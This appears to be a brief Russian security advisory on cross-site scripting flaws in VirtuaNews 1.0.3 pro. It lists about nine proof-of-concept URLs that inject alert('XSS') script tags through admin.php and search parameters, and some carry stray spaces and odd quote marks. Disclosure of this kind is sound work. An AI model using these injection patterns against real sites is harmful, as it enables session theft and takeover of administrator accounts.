Программа: VirtuaNews 1.0.3 pro 

Уязвимость в проверке правильности входных данных обнаружена в VirtuaNews. Удаленный пользователь может выполнить XSS нападение. 

http://<host>/admin.php?"> <script>alert(‘XSS’)</script>

http://< host>/forum/search.php?do= process&showposts=0&query=<script>alert(‘XSS’)
</script>

http://<host>/admin.php?action=vulns_add&catid= SELECT&title=~~~~~~~~~~~&mainnews=~~~~ «>
</textarea><script>alert(‘XSS’)</script>

http://<host>/admin.php?action=vulns_add&catid= SELECT&title=~~~~~~~~~~~&mainnews=~~~~">
</textarea>—><script>alert(‘XSS’)</s cript>

http://<host>/admin.php?»>action=vulns_add&catid= SELECT&title=~~~~~~~~~~~&mainnews=~~~~»>
</textarea><script>alert(‘XSS’)</script>

http://<host>/admin.php?act ion=files&expand="> <script>alert(‘XSS’)</script>

http://<host>/admin.php?action=files_cat_delete&id="> <script>alert(‘XSS’)</script>

http://<host>/admin.php?action=f iles_check&catid="> <script>alert(‘XSS’)</script>

http://<host>/admin.php?action=newslogo_upload&»> <script>alert(‘XSS’)</script>

Оставить мнение